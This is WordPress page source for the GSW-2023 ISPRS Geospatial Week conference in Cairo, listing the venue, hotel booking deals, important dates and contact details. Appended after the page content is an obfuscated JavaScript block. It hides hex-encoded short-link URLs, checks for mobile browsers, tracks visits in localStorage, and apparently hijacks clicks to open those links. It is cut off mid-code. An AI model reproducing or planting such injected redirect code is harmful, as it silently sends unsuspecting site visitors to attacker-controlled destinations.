css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 